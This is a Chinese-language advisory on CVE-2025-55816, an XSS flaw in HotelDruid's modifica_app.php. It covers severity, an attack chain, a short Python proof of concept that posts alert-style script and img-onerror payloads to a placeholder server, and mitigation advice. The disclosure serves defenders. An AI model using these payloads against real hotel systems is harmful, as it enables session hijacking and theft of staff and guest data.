CVE-2025-55816 HotelDruid跨站脚本(XSS)漏洞

漏洞信息

漏洞编号

CVE-2025-55816

漏洞类型

XSS（跨站脚本）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

HotelDruid

漏洞概述

CVE-2025-55816是HotelDruid软件中的一个中等严重性跨站脚本（XSS）漏洞。HotelDruid是一款开源的酒店管理系统，广泛应用于酒店、民宿、短租等住宿行业，用于管理客房预订、客户信息、酒店配置等日常运营工作。该漏洞存在于modifica_app.php文件中，攻击者可以通过构造恶意的JavaScript脚本并将其注入到应用程序的输入字段中。当其他用户访问包含恶意脚本的页面时，攻击者的脚本将在受害者浏览器中执行，从而窃取会话令牌、劫持用户账户、窃取敏感信息或进行钓鱼攻击。由于该漏洞无需认证即可利用，且攻击复杂度较低，因此具有较高的实际威胁性。攻击者可以利用此漏洞对酒店管理系统的工作人员或客户进行攻击，获取管理权限或敏感数据，对酒店运营和客户隐私造成严重影响。

技术细节

HotelDruid v3.0.7及之前版本中的跨站脚本漏洞源于modifica_app.php文件对用户输入缺乏充分的输入验证和输出编码。该文件在处理用户提交的参数时，直接将用户输入内容嵌入到HTML页面中而未进行适当的转义处理。攻击者可以通过在HTTP请求中注入恶意构造的脚本标签和JavaScript代码，例如在表单字段中插入<script>alert(document.cookie)</script>或使用事件处理器如<img src=x onerror=alert(1)>等payload。当管理员或其他用户查看被污染的页面时，恶意脚本将在其浏览器上下文中执行，从而实现会话劫持、敏感数据窃取等恶意操作。该漏洞属于存储型XSS（Stored XSS）或反射型XSS（Reflected XSS），具体取决于攻击向量的注入点和数据流。攻击者可以利用此漏洞绕过同源策略限制，访问受害者的认证凭证、cookie数据或其他敏感信息，进而对整个酒店管理系统实施进一步攻击。

攻击链分析

STEP 1

步骤1

攻击者识别目标HotelDruid系统版本，确认版本 <= v3.0.7

STEP 2

步骤2

攻击者访问modifica_app.php页面，分析可利用的输入参数

STEP 3

步骤3

构造包含恶意JavaScript代码的XSS payload

STEP 4

步骤4

通过POST或GET请求将XSS payload注入到应用程序参数中

STEP 5

步骤5

payload被存储或反射，恶意脚本嵌入到响应页面中

STEP 6

步骤6

受害者（管理员或普通用户）访问包含恶意脚本的页面

STEP 7

步骤7

恶意JavaScript在受害者浏览器中执行，窃取cookie或会话令牌

STEP 8

步骤8

攻击者利用窃取的凭证劫持用户会话，执行未授权操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-55816 PoC - HotelDruid XSS in modifica_app.php
# Target: HotelDruid <= v3.0.7

target_url = "http://target-server/modifica_app.php"

# Malicious XSS payload
xss_payload = "<script>alert(document.cookie)</script>"

# XSS via common parameter (example: app_name or similar field)
params = {
    "anno": "2025",
    "id_appartamento": "1",
    "nome_appartamento": xss_payload,
    "tipologia": "1"
}

# Send POST request with XSS payload
response = requests.post(target_url, data=params)

print(f"[*] XSS Payload sent: {xss_payload}")
print(f"[*] Response Status: {response.status_code}")

# Alternative: GET request with XSS in URL parameter
get_payload = f"<img src=x onerror=alert('XSS')>"
get_params = {
    "id_appartamento": "1",
    "nome_appartamento": get_payload
}

response2 = requests.get(target_url, params=get_params)
print(f"[*] GET request with XSS payload sent")
print(f"[*] Check if payload is reflected in response")

影响范围

HotelDruid <= v3.0.7

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1) 在Web应用防火墙（WAF）上配置XSS防护规则，过滤常见的XSS payload；2) 对modifica_app.php页面实施访问控制，限制非授权用户访问；3) 使用输入验证库对所有用户输入进行白名单过滤；4) 启用浏览器的XSS过滤器功能；5) 监控应用日志，检测异常的XSS攻击尝试；6) 提醒用户不要点击来源不明的链接，减少被钓鱼攻击的风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-55816
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-55816
3 Details https://www.cvedetails.com/cve/CVE-2025-55816/
4 VulDB https://vuldb.com/cve/CVE-2025-55816
5 Link https://www.hoteldruid.com/en/
6 Link https://www.partywave.site/show/research/cve-2025-55816-xss-and-raptx